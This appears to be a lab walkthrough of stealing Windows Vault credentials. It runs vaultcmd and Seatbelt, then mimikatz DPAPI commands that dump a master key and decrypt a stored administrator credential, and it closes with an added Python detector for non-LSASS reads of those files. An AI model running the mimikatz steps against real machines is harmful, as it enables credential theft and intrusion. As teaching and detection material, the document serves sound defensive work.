First, let’s list the credentials available in the vault.

run vaultcmd /list

Now let’s list the available credentials in the “Windows Credentials” vault.

run vaultcmd /listcreds:"Windows Credentials" /all

Notice that we have the SQL-2\Administrator credential.

We can use Seatbelt to automate this enumeration.

execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault

Now let’s dump the DPAPI keys.

mimikatz !sekurlsa::dpapi

Now let’s dump the master key.

mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc

And we got the key.

Finally, we can decrypt the credential blob.

mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
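
For defenders, the reads of the master key file and the credential blob are the part of this chain that file-access auditing can observe. The following added example (not part of the original walkthrough) flags audit records where a process other than LSASS opens either file type and raises severity when one process touches both for the same profile. The record layout, the allowlist and every sample value are constructed assumptions.

```python
import re
from collections import defaultdict

# DPAPI master key file: ...\AppData\Roaming\Microsoft\Protect\<user SID>\<GUID>
MASTERKEY = re.compile(
    r"\\Users\\([^\\]+)\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-[\d-]+"
    r"\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
# Credential Manager blob: ...\AppData\(Local|Roaming)\Microsoft\Credentials\<32 hex>
CRED_BLOB = re.compile(
    r"\\Users\\([^\\]+)\\AppData\\(?:Local|Roaming)\\Microsoft\\Credentials"
    r"\\[0-9a-f]{32}$", re.I)
# Assumption: only LSASS is expected to read these files; tune per environment.
EXPECTED = {r"c:\windows\system32\lsass.exe"}

def classify(path):
    """Return (kind, profile_name) for a DPAPI-related path, else None."""
    for kind, rx in (("masterkey", MASTERKEY), ("cred_blob", CRED_BLOB)):
        m = rx.search(path)
        if m:
            return kind, m.group(1).lower()
    return None

def detect(events):
    """events: dicts with 'image' (accessing process) and 'object' (file path).
    Returns {(image, profile): severity} for unexpected readers."""
    seen = defaultdict(set)
    for ev in events:
        image = ev["image"].lower()
        hit = classify(ev["object"])
        if hit and image not in EXPECTED:
            kind, profile = hit
            seen[(image, profile)].add(kind)
    # Master key plus credential blob from one process is the full decrypt chain.
    return {k: "high" if v == {"masterkey", "cred_blob"} else "medium"
            for k, v in seen.items()}

# Constructed sample records: placeholder SID, GUID, blob name and process paths.
MK = (r"C:\Users\alice\AppData\Roaming\Microsoft\Protect"
      r"\S-1-5-21-1111111111-2222222222-3333333333-1001"
      r"\00000000-1111-2222-3333-444444444444")
BLOB = r"C:\Users\alice\AppData\Local\Microsoft\Credentials\0123456789ABCDEF0123456789ABCDEF"
SAMPLE = [
    {"image": r"C:\Windows\System32\lsass.exe", "object": MK},
    {"image": r"C:\Users\alice\AppData\Local\Temp\updater.exe", "object": MK},
    {"image": r"C:\Users\alice\AppData\Local\Temp\updater.exe", "object": BLOB},
    {"image": r"C:\Program Files\Backup\agent.exe", "object": BLOB},
]

if __name__ == "__main__":
    for key, severity in detect(SAMPLE).items():
        print(severity, key)
```

Records of this kind only exist if object-access auditing is enabled and a SACL is set on the Protect and Credentials directories.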